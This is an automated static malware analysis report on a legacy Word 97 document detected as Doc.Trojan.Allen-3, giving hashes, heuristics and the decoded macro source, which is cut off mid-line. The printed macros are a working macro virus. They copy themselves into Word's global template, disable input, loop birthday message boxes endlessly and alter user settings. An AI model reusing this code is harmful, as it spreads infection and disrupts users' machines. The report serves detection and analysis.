Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 976ccbbabc12620f…

MALICIOUS

Office (OLE)

Size: 43.5 KB
Created: 1997-10-01 12:36:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 77244ac20bb440686445d61f26538c9e
SHA-1: e2f31e6cc9471cbc290ab0ed4ce140650d41529d
SHA-256: 976ccbbabc12620fe58a7cdcdebfa4056d2077c9d6b613a6a582ad9068a761aa
Risk Score: 220

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is identified as a malicious Word 97 document containing legacy WordBasic macros, including an AutoOpen auto-execution macro. The macro's content appears to be a birthday message, but the legacy macro-virus markers and the ClamAV detection (Doc.Trojan.Allen-3) strongly suggest malicious intent, likely to execute further payloads or perform other harmful actions upon opening.

Heuristics (4)

  • ClamAV: Doc.Trojan.Allen-3 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Allen-3
  • Legacy WordBasic macro-virus markers [high] (OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected [medium, 1 related finding] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6639 bytes
SHA-256: 98d6e7fe1e822d5512c274d500ac4937350e1e01d2281c91bb0e9e879d24463f
Detection: ClamAV: Doc.Trojan.Allen-3
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AutoExec"
Option Explicit


Public Sub MAIN()
Attribute MAIN.VB_Description = "Salam Kasih dari Edelweis-eth seorang bidak dan pencari  yang tak tahu kapan akan temu dan sampai kapan harus menunggu"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "Normal.AutoExec.MAIN"
Dim Tgl
Dim Bln
Dim Thn
Dim Jam
Dim Lebar
Dim Tinggi
Dim BarOK
Dim LebOK
Dim Pelaku$
WordBasic.DisableInput 1
WordBasic.DisableAutoMacros 0
Tgl = WordBasic.Day(WordBasic.Now())
Bln = WordBasic.Month(WordBasic.Now())
Thn = WordBasic.Year(WordBasic.Now())
Jam = WordBasic.Hour(WordBasic.Now())
Dim Pesan1$, Pelaku1$, Pelaku2$, Pelaku3$, Pelaku4$, Pelaku5$, Pelaku6$
Pelaku1$ = "Edelweis-eth"
Pelaku2$ = "Ch. Sienna"
Pelaku3$ = "My Sist"
Pelaku4$ = "Rolly"
Pelaku5$ = "Indonesia"
Pelaku6$ = "Hastoe"
If Thn < 1998 Then GoTo HUT
If Jam < 0 Then GoTo Akhir
HUT:
If Tgl = 17 And Bln = 3 Then
    Pelaku$ = Pelaku1$
    GoTo Ultah
ElseIf Tgl = 24 And Bln = 4 Then
    Pelaku$ = Pelaku2$
    GoTo Ultah
ElseIf Tgl = 1 And Bln = 6 Then
    Pelaku$ = Pelaku3$
    GoTo Ultah
ElseIf Tgl = 24 And Bln = 10 Then
    Pelaku$ = Pelaku4$
    GoTo Ultah
ElseIf Tgl = 17 And Bln = 8 Then
    Pelaku$ = Pelaku5$
    GoTo Ultah
ElseIf Tgl = 7 And Bln = 12 Then
    Pelaku$ = Pelaku6$
    GoTo Ultah
End If
GoTo Lanjut
Ultah:
    Pesan1$ = "Hari ini " + Pelaku$ + " berulang tahun, maka matikan saja komputer anda, tinggalkan semua pekerjaan dan luangkan waktu untuk mengucapkan selamat ulang tahun pada " + Pelaku$ + "."
    WordBasic.Beep
    WordBasic.MsgBox Pesan1$, "#Err 6857-Selamat Ulang Tahun, " + Pelaku$ + "....#", 48
    GoTo Ultah
Lanjut:
WordBasic.ToolsOptionsSave CreateBackup:=0, FastSaves:=0, SummaryPrompt:=0, GlobalDotPrompt:=0, NativePictureFormat:=0, EmbedFonts:=0, FormsData:=0, AutoSave:=1, SaveInterval:="5", Password:="", WritePassword:="", RecommendReadOnly:=0
WordBasic.ToolsOptionsGeneral Pagination:=1, WPHelp:=0, WPDocNavKeys:=0, BlueScreen:=0, ErrorBeeps:=1, Effects3d:=1, UpdateLinks:=1, SendMailAttach:=1, RecentFiles:=0, RecentFileCount:="", Units:=1, ButtonFieldClicks:=-1
WordBasic.ToolsOptionsUserInfo Name:="Edelweis-eth", Initials:="AIES", Address:="Kau yang selalu kucari dimana kau??" + Chr(13) + "dalam gelap tak tertebak, dalam terang tak terlacak" + Chr(13) + "Tak juga dalam mimpi-mimpi malamku" + Chr(13) + "bahkan dalam kidung-kidung doaku yang selalu kukirimkan dengan hati hampa" + Chr(13) + "DIMANA KAU??" + Chr(13)
Akhir:
End Sub

Attribute VB_Name = "AutoOpen"
Option Explicit


Public Sub MAIN()
Attribute MAIN.VB_Description = "Salam Kasih dari Edelweis-eth seorang bidak dan pencari  yang tak tahu kapan akan temu dan sampai kapan harus menunggu"
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "Normal.AutoOpen.MAIN"
Dim NFile$
Dim NMakro$
NFile$ = WordBasic.[FileName$]()
    On Error GoTo -1: On Error GoTo Akhir
    NMakro$ = NFile$ + ":AutoExec"
    WordBasic.MacroCopy NMakro$, "Global:AutoExec"
    On Error GoTo -1: On Error GoTo Akhir
    NMakro$ = NFile$ + ":AutoOpen"
    WordBasic.MacroCopy NMakro$, "Global:AutoOpen"
    On Error GoTo -1: On Error GoTo Akhir
    NMakro$ = NFile$ + ":FileOpen"
    WordBasic.MacroCopy NMakro$, "Global:FileOpen"
    On Error GoTo -1: On Error GoTo Akhir
    NMakro$ = NFile$ + ":FileSave"
    WordBasic.MacroCopy NMakro$, "Global:FileSave"
    On Error GoTo -1: On Error GoTo Akhir
    NMakro$ = NFile$ + ":FileSaveAs"
    WordBasic.MacroCopy NMakro$, "Global:FileSaveAs"
    On Error GoTo -1: On Error GoTo Akhir
    NMakro$ = NFile$ + ":FileTemplates"
    WordBasic.MacroCopy NMakro$, "Global:FileTemplates"
    On Error GoTo -1: On Error GoTo Akhir
    NMakro$ = NFile$ + ":FileMacro"
    WordBasic.MacroCopy NMakro$, "Global:FileMacro"
    On Error GoTo -1: On Error GoTo Akhir
    NMak
... (truncated)